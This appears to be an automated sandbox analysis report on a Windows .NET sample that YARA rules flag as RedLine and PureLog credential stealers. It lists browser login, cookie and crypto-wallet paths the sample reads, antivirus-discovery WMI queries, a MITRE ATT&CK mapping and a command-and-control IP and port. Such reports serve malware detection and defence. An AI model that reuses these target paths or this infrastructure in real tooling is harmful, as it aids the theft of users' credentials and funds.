                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Users\user\Desktop\lWnSA7IyVc.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: lWnSA7IyVc.exe, 00000002.00000002.1868707431.0000000001406000.00000004.00000020.00020000.00000000.sdmp, lWnSA7IyVc.exe, 00000002.00000002.1877202166.0000000006AC0000.00000004.00000020.00020000.00000000.sdmp, lWnSA7IyVc.exe, 00000002.00000002.1880801732.0000000007B09000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct

                      Stealing of Sensitive Information

                      barindex
                      Yara detected PureLog Stealer
                      Source: Yara matchFile source: 0.2.lWnSA7IyVc.exe.50e0000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.lWnSA7IyVc.exe.50e0000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.lWnSA7IyVc.exe.25ad31c.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.1687881526.00000000050E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1684656014.0000000002531000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Yara detected RedLine Stealer
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 2.2.lWnSA7IyVc.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.lWnSA7IyVc.exe.35524c8.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.lWnSA7IyVc.exe.36f37f8.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.lWnSA7IyVc.exe.35524c8.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.lWnSA7IyVc.exe.36f37f8.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.1685222888.0000000003539000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.1868490775.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1685222888.0000000003572000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: lWnSA7IyVc.exe PID: 2008, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: lWnSA7IyVc.exe PID: 3808, type: MEMORYSTR
                      Found many strings related to Crypto-Wallets (likely being stolen)
                      Source: lWnSA7IyVc.exe, 00000000.00000002.1685222888.0000000003539000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: [^\u0020-\u007F]ProcessIdname_on_cardencrypted_valuehttps://ipinfo.io/ip%appdata%\logins{0}\FileZilla\recentservers.xml%appdata%\discord\Local Storage\leveldb\tdataAtomicWalletv10/C \EtFile.IOhereuFile.IOm\walFile.IOletsESystem.UItherSystem.UIeumElectrum[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}profiles\Windows\valueexpiras21ation_moas21nth
                      Source: lWnSA7IyVc.exe, 00000002.00000002.1869963112.0000000003461000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: $^q1C:\Users\user\AppData\Roaming\Electrum\wallets\*
                      Source: lWnSA7IyVc.exe, 00000000.00000002.1685222888.0000000003539000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlite*ssfn*ExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxe*Winhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry*.vstring.ReplacedfJaxxpathBSJB
                      Source: lWnSA7IyVc.exe, 00000000.00000002.1685222888.0000000003539000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlite*ssfn*ExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxe*Winhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry*.vstring.ReplacedfJaxxpathBSJB
                      Source: lWnSA7IyVc.exe, 00000002.00000002.1869963112.0000000003461000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Ethereum\wallets
                      Source: lWnSA7IyVc.exe, 00000000.00000002.1685222888.0000000003539000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlite*ssfn*ExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxe*Winhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry*.vstring.ReplacedfJaxxpathBSJB
                      Source: lWnSA7IyVc.exe, 00000002.00000002.1869963112.0000000003461000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Ethereum
                      Source: lWnSA7IyVc.exe, 00000002.00000002.1869963112.0000000003461000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: $^q5C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*
                      Source: lWnSA7IyVc.exe, 00000000.00000002.1687881526.00000000050E0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: set_UseMachineKeyStore
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                      Tries to steal Crypto Currency Wallets
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Jump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\Jump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Jump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\Jump to behavior
                      Source: Yara matchFile source: 2.2.lWnSA7IyVc.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.lWnSA7IyVc.exe.35524c8.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.lWnSA7IyVc.exe.36f37f8.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.lWnSA7IyVc.exe.35524c8.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.lWnSA7IyVc.exe.36f37f8.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.1685222888.0000000003539000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.1868490775.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1685222888.0000000003572000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: lWnSA7IyVc.exe PID: 2008, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: lWnSA7IyVc.exe PID: 3808, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Yara detected PureLog Stealer
                      Source: Yara matchFile source: 0.2.lWnSA7IyVc.exe.50e0000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.lWnSA7IyVc.exe.50e0000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.lWnSA7IyVc.exe.25ad31c.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.1687881526.00000000050E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1684656014.0000000002531000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Yara detected RedLine Stealer
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 2.2.lWnSA7IyVc.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.lWnSA7IyVc.exe.35524c8.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.lWnSA7IyVc.exe.36f37f8.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.lWnSA7IyVc.exe.35524c8.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.lWnSA7IyVc.exe.36f37f8.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.1685222888.0000000003539000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.1868490775.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1685222888.0000000003572000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: lWnSA7IyVc.exe PID: 2008, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: lWnSA7IyVc.exe PID: 3808, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts221
                      Windows Management Instrumentation                      		1
                      DLL Side-Loading                      		111
                      Process Injection                      		1
                      Masquerading                      		1
                      OS Credential Dumping                      		231
                      Security Software Discovery                      		Remote Services1
                      Archive Collected Data                      		1
                      Encrypted Channel                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                      DLL Side-Loading                      		1
                      Disable or Modify Tools                      		LSASS Memory1
                      Process Discovery                      		Remote Desktop Protocol3
                      Data from Local System                      		11
                      Non-Standard Port                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)241
                      Virtualization/Sandbox Evasion                      		Security Account Manager241
                      Virtualization/Sandbox Evasion                      		SMB/Windows Admin SharesData from Network Shared Drive2
                      Non-Application Layer Protocol                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
                      Process Injection                      		NTDS1
                      Application Window Discovery                      		Distributed Component Object ModelInput Capture12
                      Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
                      Obfuscated Files or Information                      		LSA Secrets113
                      System Information Discovery                      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts22
                      Software Packing                      		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                      DLL Side-Loading                      		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      lWnSA7IyVc.exe68%ReversingLabsByteCode-MSIL.Trojan.Jalapeno
                      lWnSA7IyVc.exe100%AviraHEUR/AGEN.1307356
                      lWnSA7IyVc.exe100%Joe Sandbox ML

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://185.222.58.229:0%Avira URL Cloudsafe
                      185.222.58.229:556150%Avira URL Cloudsafe
                      http://185.222.58.229:55615t-0%Avira URL Cloudsafe
                      http://185.222.58.229:55615/0%Avira URL Cloudsafe
                      http://185.222.58.229:556150%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      api.ip.sb
                      		unknown
                      		unknownfalse
                        		high

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        185.222.58.229:55615true
                        • Avira URL Cloud: safe
                        		unknown
                        http://185.222.58.229:55615/true
                        • Avira URL Cloud: safe
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        https://duckduckgo.com/chrome_newtabtmp7D35.tmp.2.dr, tmp4321.tmp.2.dr, tmp4310.tmp.2.dr, tmp7D24.tmp.2.dr, tmp7CF2.tmp.2.dr, tmp42FF.tmp.2.dr, tmp7D02.tmp.2.dr, tmp7D14.tmp.2.dr, tmp4322.tmp.2.dr, tmp4332.tmp.2.dr, tmp4333.tmp.2.dr, tmp7D13.tmp.2.drfalse
                          		high
                          http://www.fontbureau.com/designersGlWnSA7IyVc.exe, 00000000.00000002.1688375389.00000000069D2000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://duckduckgo.com/ac/?q=tmp7D35.tmp.2.dr, tmp4321.tmp.2.dr, tmp4310.tmp.2.dr, tmp7D24.tmp.2.dr, tmp7CF2.tmp.2.dr, tmp42FF.tmp.2.dr, tmp7D02.tmp.2.dr, tmp7D14.tmp.2.dr, tmp4322.tmp.2.dr, tmp4332.tmp.2.dr, tmp4333.tmp.2.dr, tmp7D13.tmp.2.drfalse
                              		high
                              http://www.fontbureau.com/designers/?lWnSA7IyVc.exe, 00000000.00000002.1688375389.00000000069D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://www.founder.com.cn/cn/bThelWnSA7IyVc.exe, 00000000.00000002.1688375389.00000000069D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://schemas.xmlsoap.org/ws/2004/08/addressing/faultXlWnSA7IyVc.exe, 00000002.00000002.1869963112.00000000032B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.fontbureau.com/designers?lWnSA7IyVc.exe, 00000000.00000002.1688375389.00000000069D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://tempuri.org/Endpoint/EnvironmentSettingslWnSA7IyVc.exe, 00000002.00000002.1869963112.0000000003300000.00000004.00000800.00020000.00000000.sdmp, lWnSA7IyVc.exe, 00000002.00000002.1869963112.00000000032B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://api.ip.sb/geoiplWnSA7IyVc.exe, 00000002.00000002.1869963112.0000000003300000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://schemas.xmlsoap.org/soap/envelope/lWnSA7IyVc.exe, 00000002.00000002.1869963112.00000000032B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.tiro.comlWnSA7IyVc.exe, 00000000.00000002.1688375389.00000000069D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://api.particle.io/v1/devices/13300350003473433373737385/digitalread?access_token=Q235ad2c91caclWnSA7IyVc.exefalse
                                                		high
                                                http://tempuri.org/lWnSA7IyVc.exe, 00000002.00000002.1869963112.00000000032B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=tmp7D35.tmp.2.dr, tmp4321.tmp.2.dr, tmp4310.tmp.2.dr, tmp7D24.tmp.2.dr, tmp7CF2.tmp.2.dr, tmp42FF.tmp.2.dr, tmp7D02.tmp.2.dr, tmp7D14.tmp.2.dr, tmp4322.tmp.2.dr, tmp4332.tmp.2.dr, tmp4333.tmp.2.dr, tmp7D13.tmp.2.drfalse
                                                    		high
                                                    http://www.fontbureau.com/designerslWnSA7IyVc.exe, 00000000.00000002.1688375389.00000000069D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://www.goodfont.co.krlWnSA7IyVc.exe, 00000000.00000002.1688375389.00000000069D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://tempuri.org/Endpoint/VerifyUpdateResponselWnSA7IyVc.exe, 00000002.00000002.1869963112.00000000032B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
